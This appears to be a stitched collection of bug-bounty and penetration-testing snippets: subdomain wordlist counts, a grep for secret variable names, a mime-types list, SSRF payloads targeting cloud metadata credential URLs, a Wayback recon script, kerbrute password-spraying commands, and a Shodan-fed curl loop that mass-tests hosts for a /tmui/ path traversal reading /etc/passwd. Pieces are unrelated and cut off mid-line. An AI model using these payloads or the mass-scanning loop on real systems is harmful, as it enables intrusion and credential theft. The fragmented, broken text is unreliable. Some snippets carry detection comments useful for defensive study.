cmd@fb:/tmp|❯ wc -l 15m_sub_wordlist.txt
15677820 15m_sub_wordlist.txt
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
cmd@fb:/tmp|❯ wc -l 15m_sub_wordlist.txt
15677820 15m_sub_wordlist.txt
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
strings -f -e s * | grep -i 'BROWSER_STACK_ACCESS_KEY=\|BROWSER_STACK_USERNAME=\|browserConnectionEnabled=\|BROWSERSTACK_ACCESS_KEY=\|CHROME_CLIENT_SECRET=\|CHROME_EXTENSION_ID=\|CHROME_REFRESH_TOKEN=\|CI_DEPLOY_PASSWORD=\|CI_DEPLOY_USER=\|CLOUDAMQP_URL=\|CLOUDANT_APPLIANCE_DATABASE=\|CLOUDANT_ARCHIVED_DATABASE=\|CLOUDANT_AUDITED_DATABASE=\|CLOUDANT_ORDER_DATABASE=\|CLOUDANT_PARSED_DATABASE=\|CLOUDANT_PASSWORD=\|CLOUDANT_PROCESSED_DATABASE=\|CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN=\|CONTENTFUL_TEST_ORG_CMA_TOKEN=\|CONTENTFUL_V2_ACCESS_TOKEN=\|-DSELION_BROWSER_RUN_HEADLESS=\|-DSELION_DOWNLOAD_DEPENDENCIES=\|-DSELION_SELENIUM_RUN_LOCALLY=\|ELASTICSEARCH_PASSWORD=\|ELASTICSEARCH_USERNAME=\|EMAIL_NOTIFICATION=\|ENCRYPTION_PASSWORD=\|END_USER_PASSWORD=\|FBTOOLS_TARGET_PROJECT=\|FDfLgJkS3bKAdAU24AS5X8lmHUJB94=\|FEEDBACK_EMAIL_RECIPIENT=\|FEEDBACK_EMAIL_SENDER=\|FIREBASE_PROJECT_DEVELOP=\|FIREBASE_PROJECT_ID=\|FIREBASE_PROJECT=\|FIREBASE_SERVICE_ACCOUNT=\|FIREBASE_TOKEN=\|GH_NAME=\|GH_NEXT_OAUTH_CLIENT_ID=\|GH_NEXT_OAU |
# from https://svn.apache.org/repos/asf/httpd/httpd/trunk/docs/conf/mime.types | |
application/1d-interleaved-parityfec | |
application/3gpdash-qoe-report+xml | |
application/3gpp-ims+xml | |
application/a2l | |
application/activemessage | |
application/alto-costmap+json | |
application/alto-costmapfilter+json | |
application/alto-directory+json |
## IPv6 Tests | |
http://[::ffff:169.254.169.254] | |
http://[0:0:0:0:0:ffff:169.254.169.254] | |
## AWS | |
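# Amazon Web Services (No Header Required: this is IMDSv1 behaviour; where IMDSv2 is enforced, a plain GET without a session token is rejected) | |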
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
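# List URLs that the Wayback Machine has archived for the domains in ./urls but
# that are absent from ./urls itself, then print the ones answering 200 today.
#   input : ./urls  - one URL per line (deleted at the end, as before)
#   output: ./final - normalised scheme://host/path entries, one per line
#   temp  : ./unique, ./wayurl (deleted at the end)
# Archived-only URLs often belong to retired or forgotten endpoints, so ./final
# is worth feeding into an asset-inventory review.
#
# Every step is joined with && (the old `sort ... | comm ...` let comm read
# wayurl while sort was still rewriting it). sort and comm run under LC_ALL=C
# because comm needs both inputs sorted in the same collation.
# httpx filters on the status code itself (-mc 200); grepping for "200" also
# matched lines whose content length merely contained those digits.
unfurl -u format '%s://%d%p' < urls > unique &&
  LC_ALL=C sort -u -o unique unique &&
  unfurl -u domains < unique | waybackurls | unfurl -u format '%s://%d%p' > wayurl &&
  LC_ALL=C sort -u -o wayurl wayurl &&
  LC_ALL=C comm -13 unique wayurl > final &&
  rm -- urls unique wayurl &&
  httpx -l final --status-code -silent --content-length -mc 200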
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With the Rubeus version that includes the brute module:
# What this does: takes each ip:port pair printed by the Shodan query, requests
# a /tmui/ URL whose path contains a `..;/` segment and asks fileRead.jsp for
# /etc/passwd, then prints a red/green label depending on whether the response
# body contains the string "root".
#
# Detection: the request path is distinctive. Any access-log or WAF hit on
# `/tmui/login.jsp/..;/` (or `..;/` anywhere in a /tmui/ path) is worth alerting
# on, and the management UI it targets should not be reachable from untrusted
# networks in the first place.
#
# Reliability caveats when reading the output:
#   - `grep -q root` matches any body containing "root" (error pages included),
#     so "Vulnerable" can be a false positive.
#   - A timeout, TLS failure or refused connection also falls through to
#     "Not Vulnerable"; that label is not evidence that a host is patched.
#   - `--insecure` disables certificate verification for every request.
#   - `$host` is used as part of the printf format string, and the colour
#     escape is never reset, so later terminal output stays coloured.
#   - `while read host do ;do` reads into two variables named `host` and `do`;
#     it works only because each input line is a single word.
# NOTE(review): the trailing ` |` after `done` looks like residue from the page
# this was copied from, not part of the command; confirm before running.
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done |
undefined | |
undef | |
null | |
NULL | |
(null) | |
nil | |
NIL | |
true | |
false | |
True |